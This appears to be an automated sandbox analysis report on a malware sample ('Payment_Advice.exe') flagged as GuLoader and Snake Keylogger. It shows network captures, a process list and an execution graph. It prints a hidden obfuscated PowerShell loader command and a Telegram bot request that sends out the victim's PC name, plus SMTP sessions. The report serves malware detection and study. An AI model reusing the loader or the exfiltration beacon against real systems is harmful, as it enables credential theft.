                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-07-25 08:19:32 UTC708INHTTP/1.1 200 OK
                                                Date: Thu, 25 Jul 2024 08:19:32 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 24295
                                                Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=llI6X2N1GDT7jJHn%2FTD%2BXJz9KrlvgjsOjDvnEA5SCRTojtHzgE5lgETuNUIwro9aeXOxlzvlOT5xXR8TLypoAm003NYN2FIfRP5lA62CBn%2FbGgIZDfgHgLf0FZVILyiY8XMZf%2BNb"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8a8ab9c13d106a59-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-07-25 08:19:32 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-07-25 08:19:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.549723188.114.97.34436752C:\Program Files (x86)\Windows Mail\wab.exe
                                                TimestampBytes transferredDirectionData
                                                2024-07-25 08:19:36 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                2024-07-25 08:19:36 UTC706INHTTP/1.1 200 OK
                                                Date: Thu, 25 Jul 2024 08:19:36 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 24299
                                                Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3fAREJAHNyLn4HM%2FE2w1xrG6ZmU0q2ddjJEDCXcbeHrMnFpnZwbqCXrqilHw%2BuG4ODGtbMtrsYgQNl3TGz3%2FN4qr3GDyhLPV3Tk24TPT56KRr7T4ExKnL8JcZ6kMaU4CZEwtn47a"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8a8ab9d6ef48c431-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-07-25 08:19:36 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-07-25 08:19:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.549725188.114.97.34436752C:\Program Files (x86)\Windows Mail\wab.exe
                                                TimestampBytes transferredDirectionData
                                                2024-07-25 08:19:37 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-07-25 08:19:37 UTC706INHTTP/1.1 200 OK
                                                Date: Thu, 25 Jul 2024 08:19:37 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 24300
                                                Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ruCqajBFsdro5h4QaOZwBQj3ZddxBHOa0OjR6%2BUde8vvPEYjFdN28maJbjrU3g6Zj0SBw8nZJjH95vyi0HTDgq2XToAaWWvw%2FxBwXaKWuj4beGEH%2BFX962Hz8dprUzzqty0cx4gx"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8a8ab9df1bf44366-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-07-25 08:19:37 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-07-25 08:19:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.2.549728188.114.97.34436752C:\Program Files (x86)\Windows Mail\wab.exe
                                                TimestampBytes transferredDirectionData
                                                2024-07-25 08:19:41 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-07-25 08:19:41 UTC716INHTTP/1.1 200 OK
                                                Date: Thu, 25 Jul 2024 08:19:41 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 24304
                                                Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fEaUsUXY%2BmbGr8WzM6%2BBjPIvtngX3cj9iMQuJn85UBaU0jHfkkoqRyIZeW%2BwUNVPedL%2FKgcVmrEKLgc3oAte6mv%2Bdhjxhn1bhDw0nv59mYUKxbfFoF8t%2FobfEX%2BmjWze%2BhyTH69D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8a8ab9f9ffc00f7b-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-07-25 08:19:41 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-07-25 08:19:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                8192.168.2.549730149.154.167.2204436752C:\Program Files (x86)\Windows Mail\wab.exe
                                                TimestampBytes transferredDirectionData
                                                2024-07-25 08:19:45 UTC334OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:468325%0D%0ADate%20and%20Time:%2026/07/2024%20/%2004:58:36%0D%0ACountry%20Name:%20%0D%0A%5B%20468325%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                Host: api.telegram.org
                                                Connection: Keep-Alive
                                                2024-07-25 08:19:45 UTC344INHTTP/1.1 404 Not Found
                                                Server: nginx/1.18.0
                                                Date: Thu, 25 Jul 2024 08:19:45 GMT
                                                Content-Type: application/json
                                                Content-Length: 55
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                2024-07-25 08:19:45 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                Jul 25, 2024 10:19:52.726114035 CEST58749731192.185.142.133192.168.2.5220-joyce.websitewelcome.com ESMTP Exim 4.96.2 #2 Thu, 25 Jul 2024 03:19:52 -0500
                                                220-We do not authorize the use of this system to transport unsolicited,
                                                220 and/or bulk e-mail.
                                                Jul 25, 2024 10:19:52.726321936 CEST49731587192.168.2.5192.185.142.133EHLO 468325
                                                Jul 25, 2024 10:19:52.842161894 CEST58749731192.185.142.133192.168.2.5250-joyce.websitewelcome.com Hello 468325 [8.46.123.33]
                                                250-SIZE 52428800
                                                250-8BITMIME
                                                250-PIPELINING
                                                250-PIPECONNECT
                                                250-AUTH PLAIN LOGIN
                                                250-STARTTLS
                                                250 HELP
                                                Jul 25, 2024 10:19:52.842478037 CEST49731587192.168.2.5192.185.142.133STARTTLS
                                                Jul 25, 2024 10:19:53.166218996 CEST58749731192.185.142.133192.168.2.5220 TLS go ahead
                                                Jul 25, 2024 10:19:56.819963932 CEST58749732192.185.142.133192.168.2.5220-joyce.websitewelcome.com ESMTP Exim 4.96.2 #2 Thu, 25 Jul 2024 03:19:56 -0500
                                                220-We do not authorize the use of this system to transport unsolicited,
                                                220 and/or bulk e-mail.
                                                Jul 25, 2024 10:19:56.820117950 CEST49732587192.168.2.5192.185.142.133EHLO 468325
                                                Jul 25, 2024 10:19:56.935118914 CEST58749732192.185.142.133192.168.2.5250-joyce.websitewelcome.com Hello 468325 [8.46.123.33]
                                                250-SIZE 52428800
                                                250-8BITMIME
                                                250-PIPELINING
                                                250-PIPECONNECT
                                                250-AUTH PLAIN LOGIN
                                                250-STARTTLS
                                                250 HELP
                                                Jul 25, 2024 10:19:56.935375929 CEST49732587192.168.2.5192.185.142.133STARTTLS
                                                Jul 25, 2024 10:19:57.108762980 CEST58749732192.185.142.133192.168.2.5220 TLS go ahead

                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:04:18:38
                                                Start date:25/07/2024
                                                Path:C:\Users\user\Desktop\Payment_Advice.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\Payment_Advice.exe"
                                                Imagebase:0x400000
                                                File size:867'992 bytes
                                                MD5 hash:0347F8C12B5BB537BDBECA759B4C67F4
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Target ID:2
                                                Start time:04:18:40
                                                Start date:25/07/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"powershell.exe" -windowstyle hidden "$Mazing=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.Sys';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) "
                                                Imagebase:0x730000
                                                File size:433'152 bytes
                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2439089411.0000000009D91000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                Target ID:3
                                                Start time:04:18:40
                                                Start date:25/07/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:5
                                                Start time:04:19:09
                                                Start date:25/07/2024
                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                Imagebase:0x90000
                                                File size:516'608 bytes
                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.3299130843.0000000021787000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:false

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:20.4%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:22.1%
                                                  Total number of Nodes:1283
                                                  Total number of Limit Nodes:35
                                                  execution_graph 3727 404241 lstrcpynW lstrlenW 3728 401d41 GetDC GetDeviceCaps 3729 402b1b 18 API calls 3728->3729 3730 401d5f MulDiv ReleaseDC 3729->3730 3731 402b1b 18 API calls 3730->3731 3732 401d7e 3731->3732 3733 405f0a 18 API calls 3732->3733 3734 401db7 CreateFontIndirectW 3733->3734 3735 4024e6 3734->3735 3736 401a42 3737 402b1b 18 API calls 3736->3737 3738 401a48 3737->3738 3739 402b1b 18 API calls 3738->3739 3740 4019f0 3739->3740 3741 402744 3742 40273f 3741->3742 3742->3741 3743 402754 FindNextFileW 3742->3743 3744 4027a6 3743->3744 3746 40275f 3743->3746 3747 405ee8 lstrcpynW 3744->3747 3747->3746 3755 401cc6 3756 402b1b 18 API calls 3755->3756 3757 401cd9 SetWindowLongW 3756->3757 3758 4029c5 3757->3758 3467 401dc7 3475 402b1b 3467->3475 3469 401dcd 3470 402b1b 18 API calls 3469->3470 3471 401dd6 3470->3471 3472 401de8 EnableWindow 3471->3472 3473 401ddd ShowWindow 3471->3473 3474 4029c5 3472->3474 3473->3474 3476 405f0a 18 API calls 3475->3476 3477 402b2f 3476->3477 3477->3469 3759 4045c8 3760 4045f4 3759->3760 3761 404605 3759->3761 3820 4056a8 GetDlgItemTextW 3760->3820 3763 404611 GetDlgItem 3761->3763 3769 404670 3761->3769 3766 404625 3763->3766 3764 404754 3768 4048f5 3764->3768 3822 4056a8 GetDlgItemTextW 3764->3822 3765 4045ff 3767 40617c 5 API calls 3765->3767 3771 404639 SetWindowTextW 3766->3771 3772 4059de 4 API calls 3766->3772 3767->3761 3776 404194 8 API calls 3768->3776 3769->3764 3769->3768 3773 405f0a 18 API calls 3769->3773 3775 40412d 19 API calls 3771->3775 3777 40462f 3772->3777 3778 4046e4 SHBrowseForFolderW 3773->3778 3774 404784 3779 405a3b 18 API calls 3774->3779 3780 404655 3775->3780 3781 404909 3776->3781 3777->3771 3785 405933 3 API calls 3777->3785 3778->3764 3782 4046fc CoTaskMemFree 3778->3782 3783 40478a 3779->3783 3784 40412d 19 API calls 3780->3784 3786 405933 3 API calls 3782->3786 3823 405ee8 lstrcpynW 3783->3823 3787 404663 3784->3787 3785->3771 3788 404709 3786->3788 3821 404162 SendMessageW 3787->3821 3791 404740 SetDlgItemTextW 3788->3791 3796 405f0a 18 API calls 3788->3796 3791->3764 3792 404669 3794 406252 3 API calls 3792->3794 3793 4047a1 3795 406252 3 API calls 3793->3795 3794->3769 3802 4047a9 3795->3802 3797 404728 lstrcmpiW 3796->3797 3797->3791 3800 404739 lstrcatW 3797->3800 3798 4047e8 3824 405ee8 lstrcpynW 3798->3824 3800->3791 3801 4047ef 3803 4059de 4 API calls 3801->3803 3802->3798 3806 40597f 2 API calls 3802->3806 3808 40483a 3802->3808 3804 4047f5 GetDiskFreeSpaceW 3803->3804 3807 404818 MulDiv 3804->3807 3804->3808 3806->3802 3807->3808 3809 4048a4 3808->3809 3825 404976 3808->3825 3810 4048c7 3809->3810 3812 40140b 2 API calls 3809->3812 3833 40414f KiUserCallbackDispatcher 3810->3833 3812->3810 3813 404896 3815 4048a6 SetDlgItemTextW 3813->3815 3816 40489b 3813->3816 3815->3809 3818 404976 21 API calls 3816->3818 3817 4048e3 3817->3768 3834 40455d 3817->3834 3818->3809 3820->3765 3821->3792 3822->3774 3823->3793 3824->3801 3826 404993 3825->3826 3827 405f0a 18 API calls 3826->3827 3828 4049c8 3827->3828 3829 405f0a 18 API calls 3828->3829 3830 4049d3 3829->3830 3831 405f0a 18 API calls 3830->3831 3832 404a04 lstrlenW wsprintfW SetDlgItemTextW 3831->3832 3832->3813 3833->3817 3835 404570 SendMessageW 3834->3835 3836 40456b 3834->3836 3835->3768 3836->3835 3837 4042ca 3838 4042e2 3837->3838 3842 4043fc 3837->3842 3843 40412d 19 API calls 3838->3843 3839 404466 3840 404538 3839->3840 3841 404470 GetDlgItem 3839->3841 3848 404194 8 API calls 3840->3848 3844 4044f9 3841->3844 3845 40448a 3841->3845 3842->3839 3842->3840 3846 404437 GetDlgItem SendMessageW 3842->3846 3847 404349 3843->3847 3844->3840 3852 40450b 3844->3852 3845->3844 3851 4044b0 6 API calls 3845->3851 3868 40414f KiUserCallbackDispatcher 3846->3868 3850 40412d 19 API calls 3847->3850 3857 404533 3848->3857 3854 404356 CheckDlgButton 3850->3854 3851->3844 3855 404521 3852->3855 3856 404511 SendMessageW 3852->3856 3853 404461 3859 40455d SendMessageW 3853->3859 3866 40414f KiUserCallbackDispatcher 3854->3866 3855->3857 3858 404527 SendMessageW 3855->3858 3856->3855 3858->3857 3859->3839 3861 404374 GetDlgItem 3867 404162 SendMessageW 3861->3867 3863 40438a SendMessageW 3864 4043b0 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 3863->3864 3865 4043a7 GetSysColor 3863->3865 3864->3857 3865->3864 3866->3861 3867->3863 3868->3853 3869 401bca 3870 402b1b 18 API calls 3869->3870 3871 401bd1 3870->3871 3872 402b1b 18 API calls 3871->3872 3873 401bdb 3872->3873 3874 401beb 3873->3874 3876 402b38 18 API calls 3873->3876 3875 401bfb 3874->3875 3877 402b38 18 API calls 3874->3877 3878 401c06 3875->3878 3879 401c4a 3875->3879 3876->3874 3877->3875 3880 402b1b 18 API calls 3878->3880 3881 402b38 18 API calls 3879->3881 3882 401c0b 3880->3882 3883 401c4f 3881->3883 3885 402b1b 18 API calls 3882->3885 3884 402b38 18 API calls 3883->3884 3886 401c58 FindWindowExW 3884->3886 3887 401c14 3885->3887 3890 401c7a 3886->3890 3888 401c3a SendMessageW 3887->3888 3889 401c1c SendMessageTimeoutW 3887->3889 3888->3890 3889->3890 3891 4024ca 3892 402b38 18 API calls 3891->3892 3893 4024d1 3892->3893 3896 405b54 GetFileAttributesW CreateFileW 3893->3896 3895 4024dd 3896->3895 3897 40194b 3898 402b1b 18 API calls 3897->3898 3899 401952 3898->3899 3900 402b1b 18 API calls 3899->3900 3901 40195c 3900->3901 3902 402b38 18 API calls 3901->3902 3903 401965 3902->3903 3904 401979 lstrlenW 3903->3904 3905 4019b5 3903->3905 3906 401983 3904->3906 3906->3905 3910 405ee8 lstrcpynW 3906->3910 3908 40199e 3908->3905 3909 4019ab lstrlenW 3908->3909 3909->3905 3910->3908 3914 4019cf 3915 402b38 18 API calls 3914->3915 3916 4019d6 3915->3916 3917 402b38 18 API calls 3916->3917 3918 4019df 3917->3918 3919 4019e6 lstrcmpiW 3918->3919 3920 4019f8 lstrcmpW 3918->3920 3921 4019ec 3919->3921 3920->3921 2966 401e51 2984 402b38 2966->2984 2973 401ec6 CloseHandle 2977 402791 2973->2977 2974 401e77 WaitForSingleObject 2975 401e89 2974->2975 2976 401e9b GetExitCodeProcess 2975->2976 3004 40628b 2975->3004 2978 401eba 2976->2978 2979 401ead 2976->2979 2978->2973 2982 401eb8 2978->2982 3008 405e2f wsprintfW 2979->3008 2982->2973 2985 402b44 2984->2985 3009 405f0a 2985->3009 2988 401e57 2990 405192 2988->2990 2991 4051ad 2990->2991 3000 401e61 2990->3000 2992 4051c9 lstrlenW 2991->2992 2993 405f0a 18 API calls 2991->2993 2994 4051f2 2992->2994 2995 4051d7 lstrlenW 2992->2995 2993->2992 2997 405205 2994->2997 2998 4051f8 SetWindowTextW 2994->2998 2996 4051e9 lstrcatW 2995->2996 2995->3000 2996->2994 2999 40520b SendMessageW SendMessageW SendMessageW 2997->2999 2997->3000 2998->2997 2999->3000 3001 405663 CreateProcessW 3000->3001 3002 405692 CloseHandle 3001->3002 3003 401e67 3001->3003 3002->3003 3003->2973 3003->2974 3003->2977 3005 4062a8 PeekMessageW 3004->3005 3006 401e90 WaitForSingleObject 3005->3006 3007 40629e DispatchMessageW 3005->3007 3006->2975 3007->3005 3008->2982 3014 405f17 3009->3014 3010 406162 3011 402b65 3010->3011 3043 405ee8 lstrcpynW 3010->3043 3011->2988 3027 40617c 3011->3027 3013 405fca GetVersion 3013->3014 3014->3010 3014->3013 3015 406130 lstrlenW 3014->3015 3018 405f0a 10 API calls 3014->3018 3020 406045 GetSystemDirectoryW 3014->3020 3021 406058 GetWindowsDirectoryW 3014->3021 3022 40617c 5 API calls 3014->3022 3023 40608c SHGetSpecialFolderLocation 3014->3023 3024 405f0a 10 API calls 3014->3024 3025 4060d1 lstrcatW 3014->3025 3036 405db5 RegOpenKeyExW 3014->3036 3041 405e2f wsprintfW 3014->3041 3042 405ee8 lstrcpynW 3014->3042 3015->3014 3018->3015 3020->3014 3021->3014 3022->3014 3023->3014 3026 4060a4 SHGetPathFromIDListW CoTaskMemFree 3023->3026 3024->3014 3025->3014 3026->3014 3033 406189 3027->3033 3028 406204 CharPrevW 3031 4061ff 3028->3031 3029 4061f2 CharNextW 3029->3031 3029->3033 3031->3028 3032 406225 3031->3032 3032->2988 3033->3029 3033->3031 3034 4061de CharNextW 3033->3034 3035 4061ed CharNextW 3033->3035 3044 405960 3033->3044 3034->3033 3035->3029 3037 405e29 3036->3037 3038 405de9 RegQueryValueExW 3036->3038 3037->3014 3039 405e0a RegCloseKey 3038->3039 3039->3037 3041->3014 3042->3014 3043->3011 3045 405966 3044->3045 3046 40597c 3045->3046 3047 40596d CharNextW 3045->3047 3046->3033 3047->3045 3048 4052d1 3049 4052f2 GetDlgItem GetDlgItem GetDlgItem 3048->3049 3050 40547d 3048->3050 3093 404162 SendMessageW 3049->3093 3052 405486 GetDlgItem CreateThread FindCloseChangeNotification 3050->3052 3053 4054ae 3050->3053 3052->3053 3116 405265 OleInitialize 3052->3116 3055 4054d9 3053->3055 3057 4054c5 ShowWindow ShowWindow 3053->3057 3058 4054fe 3053->3058 3054 405363 3063 40536a GetClientRect GetSystemMetrics SendMessageW SendMessageW 3054->3063 3056 405539 3055->3056 3060 405513 ShowWindow 3055->3060 3061 4054ed 3055->3061 3056->3058 3069 405547 SendMessageW 3056->3069 3098 404162 SendMessageW 3057->3098 3102 404194 3058->3102 3065 405533 3060->3065 3066 405525 3060->3066 3099 404106 3061->3099 3067 4053d9 3063->3067 3068 4053bd SendMessageW SendMessageW 3063->3068 3075 404106 SendMessageW 3065->3075 3074 405192 25 API calls 3066->3074 3070 4053ec 3067->3070 3071 4053de SendMessageW 3067->3071 3068->3067 3072 405560 CreatePopupMenu 3069->3072 3073 40550c 3069->3073 3094 40412d 3070->3094 3071->3070 3076 405f0a 18 API calls 3072->3076 3074->3065 3075->3056 3078 405570 AppendMenuW 3076->3078 3080 4055a0 TrackPopupMenu 3078->3080 3081 40558d GetWindowRect 3078->3081 3079 4053fc 3082 405405 ShowWindow 3079->3082 3083 405439 GetDlgItem SendMessageW 3079->3083 3080->3073 3084 4055bb 3080->3084 3081->3080 3085 405428 3082->3085 3086 40541b ShowWindow 3082->3086 3083->3073 3087 405460 SendMessageW SendMessageW 3083->3087 3088 4055d7 SendMessageW 3084->3088 3097 404162 SendMessageW 3085->3097 3086->3085 3087->3073 3088->3088 3089 4055f4 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3088->3089 3091 405619 SendMessageW 3089->3091 3091->3091 3092 405642 GlobalUnlock SetClipboardData CloseClipboard 3091->3092 3092->3073 3093->3054 3095 405f0a 18 API calls 3094->3095 3096 404138 SetDlgItemTextW 3095->3096 3096->3079 3097->3083 3098->3055 3100 404113 SendMessageW 3099->3100 3101 40410d 3099->3101 3100->3058 3101->3100 3103 4041ac GetWindowLongW 3102->3103 3113 404235 3102->3113 3104 4041bd 3103->3104 3103->3113 3105 4041cc GetSysColor 3104->3105 3106 4041cf 3104->3106 3105->3106 3107 4041d5 SetTextColor 3106->3107 3108 